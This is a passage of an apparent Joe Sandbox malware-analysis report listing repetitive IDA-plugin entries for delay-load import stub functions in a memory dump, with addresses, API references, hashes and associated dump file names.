Opcode Fuzzy Hash: 2d56fe8f1aebf27c523dcf1c7579f82ddd929ad2973f3e2d5c03fa2fcd5f8d9a
Instruction Fuzzy Hash: 35B012D6279100EC3504A2451D46C3B010DC0C1F11731803FFC0DC01C0FCA06D3D0931

Function 0023E21E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0023E1E3

Part of subcall function 0023E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0023E8D0
Part of subcall function 0023E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0023E8E1

Strings

#, xrefs: 0023E1DD

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: #
API String ID: 1269201914-1065395832
Opcode ID: 3a98c312b1ef7bb99e29b8a62a9f8e0c0c7a813314b287f6d47676c3bc7a7721
Instruction ID: 362e26ddb27de2745a728968280fa327802198433435f57470cd1d1d00deeebc
Opcode Fuzzy Hash: 3a98c312b1ef7bb99e29b8a62a9f8e0c0c7a813314b287f6d47676c3bc7a7721
Instruction Fuzzy Hash: 31B092E5279100AC2504A1451806D3B010EC082F21731802ABC09C00C0E890AD280931

Function 0023E264 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0023E1E3

Part of subcall function 0023E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0023E8D0
Part of subcall function 0023E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0023E8E1

Strings

#, xrefs: 0023E1DD

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: #
API String ID: 1269201914-1065395832
Opcode ID: 0f2c4ec5083ebdd4debc7e3e7a52a0ce2c8c3452d1656453b82c8f872fa1f14c
Instruction ID: 7bf9106349d54327407256db6f27426b9cefef0fadddde9de998ed9a78e612db
Opcode Fuzzy Hash: 0f2c4ec5083ebdd4debc7e3e7a52a0ce2c8c3452d1656453b82c8f872fa1f14c
Instruction Fuzzy Hash: 0EB012D527A140EC3904A1851C06C3B014EC4C1F11B31403FFC0EC00C0F8906C3C0931

Function 0023E26E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0023E1E3

Part of subcall function 0023E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0023E8D0
Part of subcall function 0023E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0023E8E1

Strings

#, xrefs: 0023E1DD

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: #
API String ID: 1269201914-1065395832
Opcode ID: f320c5807226e563942ea0827de60148d73cd22667ecab3a977351402babe6a4
Instruction ID: 4097ce144b52b1c3ea22f19352bce9857efa465d2afbb54eef9f413b86446815
Opcode Fuzzy Hash: f320c5807226e563942ea0827de60148d73cd22667ecab3a977351402babe6a4
Instruction Fuzzy Hash: 13B092D5279100AC2504A1551806C3B014DC082F11731802ABC09C00C0E890AC280931

Function 0023E246 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0023E1E3

Part of subcall function 0023E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0023E8D0
Part of subcall function 0023E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0023E8E1

Strings

#, xrefs: 0023E1DD

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: #
API String ID: 1269201914-1065395832
Opcode ID: 7c03c64a6677faf24cdc76ab326aa373e7721bbf4187bcfe5f67b134443cb994
Instruction ID: 058e8419c51c68fb93110caf908e59d73a6e91b65f31f017d33538d5cdf508a8
Opcode Fuzzy Hash: 7c03c64a6677faf24cdc76ab326aa373e7721bbf4187bcfe5f67b134443cb994
Instruction Fuzzy Hash: 9CB012D527A140EC3904A1451C06C3B010EC0C2F11B31803FFC0DC00C0F890AC3C0931

Function 0023E250 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0023E1E3

Part of subcall function 0023E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0023E8D0
Part of subcall function 0023E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0023E8E1

Strings

#, xrefs: 0023E1DD

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: #
API String ID: 1269201914-1065395832
Opcode ID: 337e8a76b7fe3b09592fe95dc73dad01db0032b3c80ca2fd0f3b9c4fa506b226
Instruction ID: 6b32a82cc3eadfbb6995ab25db609cc04cf9cf25f6b0c918096bce5bb4cf21a7
Opcode Fuzzy Hash: 337e8a76b7fe3b09592fe95dc73dad01db0032b3c80ca2fd0f3b9c4fa506b226
Instruction Fuzzy Hash: 7AB012E527A240FC3944A2455C06C3B010EC0C1F11B31413FFC0DC00C0F8906C7C0A31

Function 0023E2B4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0023E1E3

Part of subcall function 0023E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0023E8D0
Part of subcall function 0023E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0023E8E1

Strings

#, xrefs: 0023E1DD

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: #
API String ID: 1269201914-1065395832
Opcode ID: 82e6a07002bab52f2fa767bf309b0c3e5973dd8d13761d2110b29e6cd10f966a
Instruction ID: e45be2845d452b2df4652c64f9a2d635c440f30cab550697da84aaf80bae5d7b
Opcode Fuzzy Hash: 82e6a07002bab52f2fa767bf309b0c3e5973dd8d13761d2110b29e6cd10f966a
Instruction Fuzzy Hash: 7CB092D5679100AC3504A1451806C3B010DD081F11731442AB809C00C0A8906C280931

Function 0023E282 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0023E1E3

Part of subcall function 0023E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0023E8D0
Part of subcall function 0023E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0023E8E1

Strings

#, xrefs: 0023E1DD

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: #
API String ID: 1269201914-1065395832
Opcode ID: 7af02a8ca6707091203b51453f56bc6df5a22831537329e65485a477c2c90b12
Instruction ID: bdc8d346cb6a408fb1f080bd9369b07d513bdf6560ba9a2bd909496d2a3d2732
Opcode Fuzzy Hash: 7af02a8ca6707091203b51453f56bc6df5a22831537329e65485a477c2c90b12
Instruction Fuzzy Hash: CEB092E5279100AC2504A1451946C3B018DC081F11B31402AB809C00C0A8906D290931

Function 0023E528 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0023E51F

Part of subcall function 0023E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0023E8D0
Part of subcall function 0023E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0023E8E1

Strings

(#, xrefs: 0023E519, 0023E528

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: (#
API String ID: 1269201914-2223102492
Opcode ID: b68ee9fa5061eb062f71e1ac27825eaf0e38ccb80b8c7545659325be731beb39
Instruction ID: dec973478b0cea9230f7e5257cd67ee9de04254d49e7344d16182c92605cea5d
Opcode Fuzzy Hash: b68ee9fa5061eb062f71e1ac27825eaf0e38ccb80b8c7545659325be731beb39
Instruction Fuzzy Hash: EAB012C5679140BC3904B1081D02C3B050DC0C2F15771802EF804C41C0F8800D7E0931

Function 0023E50D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0023E51F

Part of subcall function 0023E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0023E8D0
Part of subcall function 0023E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0023E8E1

Strings

(#, xrefs: 0023E519

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: (#
API String ID: 1269201914-2223102492
Opcode ID: 706f77fcdd11233ca297bace5b2dcbc33340cbf7481932429131a220672b8cd8
Instruction ID: 99d78e60e0d841382370616cdd7158374abc0bb69d680cc3b0fb00ce708900fa
Opcode Fuzzy Hash: 706f77fcdd11233ca297bace5b2dcbc33340cbf7481932429131a220672b8cd8
Instruction Fuzzy Hash: 20B012C5679100BC390471241C06C3B010DC0C2F16B71403EFC10C04C1B8800E7D0831

Function 0023E546 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0023E51F

Part of subcall function 0023E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0023E8D0
Part of subcall function 0023E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0023E8E1

Strings

(#, xrefs: 0023E519

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: (#
API String ID: 1269201914-2223102492
Opcode ID: 3aa2e4b7d949627a7e9767d6229773abd3604f6479c57fb777b24c034d2cb476
Instruction ID: 4d8bc37c07ecbca86f54af3713417bed4684ceb093fc603f02a9f5273a34d9cd
Opcode Fuzzy Hash: 3aa2e4b7d949627a7e9767d6229773abd3604f6479c57fb777b24c034d2cb476
Instruction Fuzzy Hash: 52B012C5679200BC3A04B1089C03C3B010DC0C2F15771422EF804C00C0F8800DBD1935

Function 0023E219 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0023E1E3

Part of subcall function 0023E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0023E8D0
Part of subcall function 0023E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0023E8E1

Strings

#, xrefs: 0023E1DD

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: #
API String ID: 1269201914-1065395832
Opcode ID: 1c11f0fd78190e1ebe091902eb2c76752fd3bddaa521eedeb08ced69b8534a76
Instruction ID: a119d078d61709ca5f4547489ae2255b98f21cbc4301851584a86b8460e2353d
Opcode Fuzzy Hash: 1c11f0fd78190e1ebe091902eb2c76752fd3bddaa521eedeb08ced69b8534a76
Instruction Fuzzy Hash: D2A001E66B9242FC390862926D46C3B021EC4C6B66B72896EFC5AD44D1B8A06C6D1875

Function 0023E27D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0023E1E3

Part of subcall function 0023E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0023E8D0
Part of subcall function 0023E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0023E8E1

Strings

#, xrefs: 0023E1DD

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: #
API String ID: 1269201914-1065395832
Opcode ID: 3835945e949354a1a38200a48e8318548f9af43445c339452d21ee3246ac3152
Instruction ID: a119d078d61709ca5f4547489ae2255b98f21cbc4301851584a86b8460e2353d
Opcode Fuzzy Hash: 3835945e949354a1a38200a48e8318548f9af43445c339452d21ee3246ac3152
Instruction Fuzzy Hash: D2A001E66B9242FC390862926D46C3B021EC4C6B66B72896EFC5AD44D1B8A06C6D1875

Function 0023E25F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0023E1E3

Part of subcall function 0023E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0023E8D0
Part of subcall function 0023E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0023E8E1

Strings

#, xrefs: 0023E1DD

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: #
API String ID: 1269201914-1065395832
Opcode ID: b9a94e5f8f28b88f686d4d0f3c800a95dc384f7f1a9894fe85b7f1ffbf41f843
Instruction ID: a119d078d61709ca5f4547489ae2255b98f21cbc4301851584a86b8460e2353d
Opcode Fuzzy Hash: b9a94e5f8f28b88f686d4d0f3c800a95dc384f7f1a9894fe85b7f1ffbf41f843
Instruction Fuzzy Hash: D2A001E66B9242FC390862926D46C3B021EC4C6B66B72896EFC5AD44D1B8A06C6D1875

Function 0023E2A5 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0023E1E3

Part of subcall function 0023E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0023E8D0
Part of subcall function 0023E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0023E8E1

Strings

#, xrefs: 0023E1DD

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: #
API String ID: 1269201914-1065395832
Opcode ID: ce970d78382455a685670c30bc5c2cece26659130861689ca79f4e81ff31636c
Instruction ID: a119d078d61709ca5f4547489ae2255b98f21cbc4301851584a86b8460e2353d
Opcode Fuzzy Hash: ce970d78382455a685670c30bc5c2cece26659130861689ca79f4e81ff31636c
Instruction Fuzzy Hash: D2A001E66B9242FC390862926D46C3B021EC4C6B66B72896EFC5AD44D1B8A06C6D1875

Function 0023E2AF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0023E1E3

Part of subcall function 0023E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0023E8D0
Part of subcall function 0023E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0023E8E1

Strings

#, xrefs: 0023E1DD

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: #
API String ID: 1269201914-1065395832
Opcode ID: 746bc1e16b6b1fef7dbd95c5f3161d12c6009569f403c89aff5faccda9c6283d
Instruction ID: a119d078d61709ca5f4547489ae2255b98f21cbc4301851584a86b8460e2353d
Opcode Fuzzy Hash: 746bc1e16b6b1fef7dbd95c5f3161d12c6009569f403c89aff5faccda9c6283d
Instruction Fuzzy Hash: D2A001E66B9242FC390862926D46C3B021EC4C6B66B72896EFC5AD44D1B8A06C6D1875

Function 0023E291 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0023E1E3

Part of subcall function 0023E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0023E8D0
Part of subcall function 0023E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0023E8E1

Strings

#, xrefs: 0023E1DD

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: #
API String ID: 1269201914-1065395832
Opcode ID: a6cde7f6d02ef00d8be326f8c610316ad8e5cf21fd44aa92698f3b548481bdd4
Instruction ID: a119d078d61709ca5f4547489ae2255b98f21cbc4301851584a86b8460e2353d
Opcode Fuzzy Hash: a6cde7f6d02ef00d8be326f8c610316ad8e5cf21fd44aa92698f3b548481bdd4
Instruction Fuzzy Hash: D2A001E66B9242FC390862926D46C3B021EC4C6B66B72896EFC5AD44D1B8A06C6D1875

Function 0023E29B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0023E1E3

Part of subcall function 0023E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0023E8D0
